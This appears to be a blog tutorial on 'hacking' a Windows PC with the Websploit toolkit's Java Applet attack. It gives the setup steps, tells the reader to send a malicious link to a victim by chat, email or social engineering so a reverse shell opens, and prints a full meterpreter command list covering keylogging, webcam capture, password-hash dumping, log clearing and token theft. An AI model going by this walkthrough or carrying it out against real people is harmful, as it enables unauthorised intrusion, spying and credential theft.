Loading...

Hack Windows PC By Using Websploit Toolkit

Hi Friends in this tutorial am going to explain how to Hack Windows PC by Using Websploit Toolkit


First of all Install Websploit Toolkit in Backtrack

Requirements of Tutorial

Backtrack 5
Windows XP Machine (Target)
Open Your Backtrack terminal and Type cd  /pentest/web/websploit
Now Open WebSploit Toolkit (SET)  ./websploit

Now choose option 2 “Network Attack Vector”



Now choose option 3 “Java Applet Attack”
Wsf: java Applet > Enter Interface Name: eth0
Wsf: java Applet > Enter Your IP Address: 192.168.1.2
Wsf: java Applet > Enter Main Applet’s Class Name: java
Wsf: java Applet > Enter Name of Publisher: java

Now an URL you should give to your victim http://192.168.226.134:8080/index
 Send the link of the server to the victim via chat or email or any social engineering technique or any other.
 
When the victim open that link in their browser, directly it'll alert a panel regarding digital signature can't be verified like image below.

If our victim click on the Run button then the exploit will execute and it'll return a remote shell to our system. future 3 pictures are  proving that the attack was are.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


 Now u can explore victims pc by using many commands we can uuse help in meterpreter for getting what sort of commands we can use to explore victims Pc

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter > 
by using the above commands we can explore the system inmany ways  the below image u can see the windows directory of the victim machine

Happy Hacking!
Reactions: 
Penetration testing 461891844983268353

Post a Comment

emo-but-icon

Home item

Follow by Email

Recommend on Google

Advertisements

Advertisements

Popular Posts

Random Posts

Recent Posts

ADS

eXTReMe Tracker